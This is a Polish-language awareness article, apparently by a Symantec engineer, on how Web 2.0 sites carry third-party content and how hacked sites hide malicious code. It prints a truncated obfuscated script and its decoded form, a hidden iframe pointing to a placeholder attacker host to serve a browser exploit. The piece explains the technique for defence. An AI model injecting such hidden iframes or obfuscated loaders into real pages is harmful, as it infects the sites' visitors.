Niemal codziennie każda korzystająca z komputera osoba choćby na chwilę wyświetla w swojej przeglądarce jakąś stronę WWW. Czytamy blogi, serwisy informacyjne, odwiedzamy portale społecznościowe. Mało kto zdaje sobie jednak sprawę, że w przypadku witryn wykonanych zgodnie z ideą Web 2.0 nawet połowa treści strony może być stworzona przez kogoś innego niż właściciel serwisu! Aby to wykazać, warto wskazać na elementy, z których składa się taka witryna (patrz: schemat "Elementy witryny Web 2.0").

Znajdziemy tu szereg elementów pobieranych z innych miejsc Sieci. Najprostszym przykładem jest baner reklamowy. Nie jest on kontrolowany przez właściciela strony WWW. Zazwyczaj charakteryzuje się obniżonym poziomem bezpieczeństwa - przeładowuje się z każdą wizytą odwiedzającego. Może zawierać technologię Flash lub inne typy skryptów aktywnych. Sama technologia nie jest oczywiście kontrolowana przez właściciela strony i działa jako własna aplikacja, która może być podatna na ataki. Inne zewnętrzne dane to np. linki do zewnętrznych adresów URL poza przestrzenią właściciela strony. Informacje znajdują się na "zwykłej" stronie, dlatego użytkownik może uwierzyć, że dane te są godne "zaufania". Mamy też jeszcze komentarze: są one tworzone przez użytkowników i mogą być dodawane również w złych intencjach. Otwiera to możliwość publikowania wprowadzających w błąd linków lub informacji, które mogą prowadzić do zagrożeń i narażać odwiedzających na niebezpieczeństwo.

Zdradliwy język

Języki opisu stron WWW umożliwiają ukrywanie niebezpiecznego kodu przed niewprawnym okiem administratora zhakowanego serwisu. Cyberprzestępcy specjalizują się więc w przejmowaniu popularnych i słabo zabezpieczonych witryn o dużej popularności. Na przykład poniższy, niezrozumiały dla człowieka kod, zaczynający się od:

<script type="text/javascript">

document.write(unescape(%3C%69%66%72¬

%61%6D%65%20%73%72%63%3D%22 (...)'));

</script>

może przybrać postać:

<iframe src=" http://jakas-strona-¬

hakerska.info/in.php?s_id=1" ¬

style="visibility: hidden; ¬

display: none">

</iframe>

Za jego pomocą niebezpieczna strona ukrywa się pod adresem innej, której użytkownik ufa. Użycie znacznika IFRAME oznacza bowiem pobranie zewnętrznej treści, choć w oknie przeglądarki nadal widoczna jest właściwa strona WWW. W takiej dodatkowej, ukrytej ramce może być umieszczony złośliwy kod, który będzie próbował wykorzystać podatność w przeglądarce. Takie działanie może zakończyć się infekcją naszego komputera (z przykładem tego typu ataku można zapoznać się pod adresem http://tinyurl.com/y3vavs7). Cyberprzestępcy "polubili" ten sposób ataku ze względu na jego efektywność. Możliwości jest bardzo dużo - wystarczy wysłać e-mail z adresem strony, na której znajduje się exploit, umieścić taki link na portalu społecznościowym czy zaatakować serwer WWW, aby przekierowywać odwiedzających. Wszystkie sprowadzają się w zasadzie do jednej prostej czynności - nakłonienia użytkownika, by odwiedził określony URL.

[...]

Autor jest inżynierem systemowym w firmie Symantec Polska odpowiedzialnym za produkty do ochrony stacji końcowych.